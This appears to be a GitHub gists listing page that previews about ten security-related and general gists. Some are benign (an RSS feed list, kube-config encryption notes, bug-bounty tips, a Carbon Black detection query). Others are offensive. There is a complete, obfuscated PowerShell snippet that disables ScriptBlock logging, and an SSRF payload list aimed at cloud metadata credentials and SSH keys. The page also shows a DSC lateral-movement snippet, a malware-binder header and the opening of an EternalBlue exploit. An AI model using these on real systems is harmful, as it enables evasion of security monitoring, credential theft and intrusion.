Skip to content

Instantly share code, notes, and snippets.

View enderax's full-sized avatar

Ender Akbas enderax

39 followers · 54 following
View GitHub Profile
@gkmngrgn
gkmngrgn / feeds_2022-12-25.opml
Last active February 10, 2023 09:07
<?xml version="1.0" encoding="UTF-8"?>
<opml version="2.0">
<head>
<title>FreshRSS</title>
<dateCreated>Sun, 25 Dec 2022 20:57:12</dateCreated>
</head>
<body>
<outline text="APPS">
<outline text="FreshRSS releases" type="rss" xmlUrl="https://github.com/FreshRSS/FreshRSS/releases.atom" htmlUrl="https://github.com/FreshRSS/FreshRSS/" description="FreshRSS releases @ GitHub"/>
</outline>
@PatrLind
PatrLind / protect-kube-config.md
Created April 26, 2021 08:43
How to protect your ~/.kube/ configuration

How to protect your ~/.kube/ configuration

I had a need to protect my Kubernetes config file on my computer against accidental or malicious change or reading, so I came up with this way of protecting the config files.

How it works

The ~/.kube folder is mounted using encfs. By using the --ondemand flag it will automatically ask for the encryption key/password when accessed and keep

@curi0usJack
curi0usJack / cbapi-ps-lsass-loop.py
Last active August 23, 2018 13:16
# Carbon Black Evil PowerShell LSASS Query
#
# Prints out malicious Powershell events that have a crossproc event for c:\windows\system32\lsass.exe
#
# Author: Jason Lang (@curi0usJack)
#
# Prereqs (Windows 10)
# Install bash on Win10
# sudo apt-get install python-pip
# sudo pip install --upgrade requests
@jhaddix
jhaddix / cloud_metadata.txt
Last active October 13, 2025 08:38 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@mattifestation
mattifestation / PowerShellDSCLateralMovement.ps1
Created March 4, 2018 23:24
# This idea originated from this blog post on Invoke DSC Resources directly:
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/
<#
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
ResourceID = "[Script]ScriptExample";
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
@JohnLaTwC
JohnLaTwC / Macro-Doc-Scriptlet-Ps1 threat
Created February 15, 2018 22:49
## uploaded by @JohnLaTwC
## Sample hash: 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
olevba 0.52dev7 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OLE:MASI---- 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
===============================================================================
FILE: 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
Type: OLE
-------------------------------------------------------------------------------
@DarkCoderSc
DarkCoderSc / File2Batch.py
Last active April 3, 2021 13:21
#-----------------------------------------------------------------------------------------------------------------------
# PHROZEN SAS (c) 2018 - www.phrozen.io
# Jean-Pierre LESUEUR (jplesueur@phrozen.io)
#
# Name : File2Batch
# Description : File Binder (Wrapper) only using Batch commands (.BAT output extension)
# Category : Malware Research
# Version : 0.1 (07/02/2018)
# Target OS : Windows XP->Windows 10 (32/64bit)
# License : MIT
@EdOverflow
EdOverflow / github_bugbountyhunting.md
Last active September 16, 2025 17:32
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@cobbr
cobbr / ScriptBlockLogBypass.ps1
Last active August 26, 2025 10:50
ScriptBlock Logging Bypass
# ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
@worawit
worawit / eternalblue8_exploit.py
Last active March 16, 2024 18:38
Eternalblue exploit for Windows 8/2012
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)